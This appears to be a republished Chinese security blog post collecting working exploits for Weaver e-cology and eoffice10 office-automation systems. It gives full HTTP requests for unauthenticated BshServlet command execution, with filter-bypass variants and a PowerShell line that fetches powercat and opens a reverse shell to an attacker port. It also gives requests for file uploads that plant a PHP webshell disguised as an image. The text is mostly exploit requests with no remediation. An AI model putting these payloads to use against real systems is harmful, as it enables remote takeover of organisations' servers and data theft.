泛微OA漏洞
2022-7-30 00:31:36 Author: 利刃信安(查看原文) 阅读量:1189 收藏



泛微OA E-Cology BshServlet 远程代码执行漏洞

漏洞描述

泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行。

影响版本

E-cology 7.0 

E-cology 8.0 

E-cology 8.1 

E-cology 9.0

漏洞描述

直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/,如下图在victim上执行了命令“whoami”

POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: xxxxxxxx:8088
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded

bsh.script=ex\u0065c("cmd /c dir");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

绕过

eval%00("ex"%2b"ec(\"whoami\")");
ex\u0065c("cmd /c dir");
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd

泛微OA E-Cology 文件上传漏洞

漏洞描述

泛微OA E-Cology 文件上传漏洞。

影响产品

8.0/9.010.47以下和其他版本

漏洞详情

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1 
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS" 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ 
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document 
Accept-ENCoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 393

------WebKitFormBoundarymVk33liI64J7GQaK 
Content-Disposition: form-data; name="secId"

1
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"

Test
------WebKitFormBoundarymVk33liI64J7GQaK 
Content-Disposition: form-data; name="plandetailid"

1
------WebKitFormBoundarymVk33liI64J7GQaK—

将文件释放至跟网站根路径下,在数据包中将 fileid 替换

POST /OfficeServer HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS" 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ 
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: documentAccept-ENCoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 207

------WebKitFormBoundarymVk33liI64J7GQaK 
Content-Disposition: form-data; name="aaa"

{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'} 
------WebKitFormBoundarymVk33liI64J7GQaK—

泛微 eoffice 10 前台 GetShell

漏洞描述

泛微 eoffice 10 前台 GetShell。

影响产品

泛微 eoffice10

漏洞详情

版本号:http://XXXXXXX:8010/eoffice10/version.json

<form method='post' action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php' eNCtype="multipart/form-data">
<input type="file" name="FileData"/></br></br>
<input type="text" name="FormData" value="1"/></br></br>
<button type=submit value="上传">上传</button> </form>

shell http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 
Host: XXXXXXXX:8010
Content-Length: 378 
Cache-Control: max-age=0 
Upgrade-Insecure-Requests: 1 
Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ 
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-ENCoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 
Connection: close

------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg" 
Content-Type: image/jpeg

<?php echo md5(1);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs 
Content-Disposition: form-data; name="FormData"

{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}

------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--


文章来源: http://mp.weixin.qq.com/s?__biz=MzU1Mjk3MDY1OA==&mid=2247496143&idx=1&sn=d40bcc049cf3e4dae62421ae04898c52&chksm=fbfb4102cc8cc814c1af233a03b109ca46202299aa1f6aab378ae0500e4257ba8233f583c90b#rd
如有侵权请联系:admin#unsafe.sh